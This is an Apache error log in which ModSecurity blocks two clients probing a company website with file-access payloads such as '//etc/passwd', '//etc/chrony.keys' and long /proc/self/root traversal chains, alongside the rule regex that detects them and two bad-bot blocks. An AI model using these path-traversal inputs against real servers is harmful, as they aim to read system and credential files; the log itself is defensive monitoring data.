[Wed Mar 18 04:25:19.635052 2026] [:error] [pid 19507:tid 140411599251200] [client 216.73.216.191:55266] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTX9Y0UrI5A3LftIxXIgAAAZE"]
[Wed Mar 18 04:25:21.772133 2026] [:error] [pid 26799:tid 140411632822016] [client 216.73.216.191:55332] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/passwd-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTYda6ubjKNq_cu4ZbGwAAA00"]
[Wed Mar 18 04:25:23.460290 2026] [:error] [pid 30077:tid 140411666392832] [client 216.73.216.191:55424] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTY_u8EFLIOrSqIpvKuAAAAkk"]
[Wed Mar 18 04:25:24.579319 2026] [:error] [pid 17653:tid 140411725141760] [client 216.73.216.191:55498] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTZMdf6f5d65gmYZSViwAAAsI"]
[Wed Mar 18 04:25:25.187593 2026] [:error] [pid 17887:tid 140411741927168] [client 216.73.216.191:55534] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTZQkwaGbbGflqUZDW5AAAAMA"]
[Wed Mar 18 04:25:25.487060 2026] [:error] [pid 11816:tid 140411674785536] [client 216.73.216.191:55506] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTZew_le52K8_3pV2kuQAAAgg"]
[Wed Mar 18 04:25:26.983227 2026] [:error] [pid 30077:tid 140411557287680] [client 216.73.216.191:55578] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/cron.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTZfu8EFLIOrSqIpvKvAAAAlY"]
[Wed Mar 18 04:25:27.000660 2026] [:error] [pid 19507:tid 140411599251200] [client 216.73.216.191:55572] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTZdY0UrI5A3LftIxXLwAAAZE"]
[Wed Mar 18 04:25:28.308288 2026] [:error] [pid 29882:tid 140411557287680] [client 216.73.216.191:55646] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTaEzinOy1jxa1j4fXPAAAARY"]
[Wed Mar 18 04:25:29.337325 2026] [:error] [pid 17887:tid 140411590858496] [client 216.73.216.191:55712] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTaQkwaGbbGflqUZDW6AAAANI"]
[Wed Mar 18 04:25:41.987201 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:48494] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTdQkwaGbbGflqUZDW9gAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/run/initramfs/state/etc
[Wed Mar 18 04:26:00.811905 2026] [:error] [pid 11816:tid 140411548894976] [client 216.73.216.191:56504] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTiOw_le52K8_3pV2k2QAAAhc"]
[Wed Mar 18 04:26:07.110822 2026] [:error] [pid 15051:tid 140411725141760] [client 216.73.216.191:56616] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTiymAPhZkrhU8w4kx-gAAAII"]
[Wed Mar 18 04:26:09.711847 2026] [:error] [pid 29882:tid 140411649607424] [client 216.73.216.191:56782] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTkUzinOy1jxa1j4fXUwAAAQs"]
[Wed Mar 18 04:26:10.707049 2026] [:error] [pid 17653:tid 140411624429312] [client 216.73.216.191:56856] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTksdf6f5d65gmYZSVuwAAAs4"]
[Wed Mar 18 04:26:11.004419 2026] [:error] [pid 26799:tid 140411716749056] [client 216.73.216.191:56806] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTk9a6ubjKNq_cu4ZbNwAAA0M"]
[Wed Mar 18 04:26:11.420649 2026] [:error] [pid 15826:tid 140411733534464] [client 216.73.216.191:56904] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTk-oXxyEfFpUF8f8xSwAAAUE"]
[Wed Mar 18 04:26:17.503050 2026] [:error] [pid 11816:tid 140411624429312] [client 216.73.216.191:57282] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTmew_le52K8_3pV2k6gAAAg4"]
[Wed Mar 18 04:26:22.676589 2026] [:error] [pid 30077:tid 140411641214720] [client 216.73.216.191:57658] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTnvu8EFLIOrSqIpvK7AAAAkw"]
[Wed Mar 18 04:26:23.375773 2026] [:error] [pid 29882:tid 140411699963648] [client 216.73.216.191:57710] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTn0zinOy1jxa1j4fXXwAAAQU"]
[Wed Mar 18 04:26:27.291443 2026] [:error] [pid 11816:tid 140411641214720] [client 216.73.216.191:57990] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTo-w_le52K8_3pV2k9wAAAgw"]
[Wed Mar 18 04:26:27.399118 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.241.31:58732] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTo_u8EFLIOrSqIpvK8wAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:26:31.894521 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.241.31:58728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTp-yqAr6etmhZHNp-IgAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:26:34.241616 2026] [:error] [pid 15051:tid 140411691570944] [client 74.7.241.31:58732] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTqimAPhZkrhU8w4kyFQAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:27:00.262838 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.241.31:58734] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTxMdf6f5d65gmYZSV_QAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:27:08.122795 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.244.43:32810] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpTzPu8EFLIOrSqIpvK_gAAAlY"]
[Wed Mar 18 04:27:12.078922 2026] [:error] [pid 29882:tid 140411716749056] [client 74.7.228.61:34460] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpT0EzinOy1jxa1j4fXcwAAAQM"]
[Wed Mar 18 04:27:21.966053 2026] [:error] [pid 29882:tid 140411666392832] [client 216.73.216.191:59282] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpT2UzinOy1jxa1j4fXegAAAQk"]
[Wed Mar 18 04:27:22.963609 2026] [:error] [pid 15051:tid 140411624429312] [client 216.73.216.191:59352] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpT2imAPhZkrhU8w4kyLwAAAI4"]
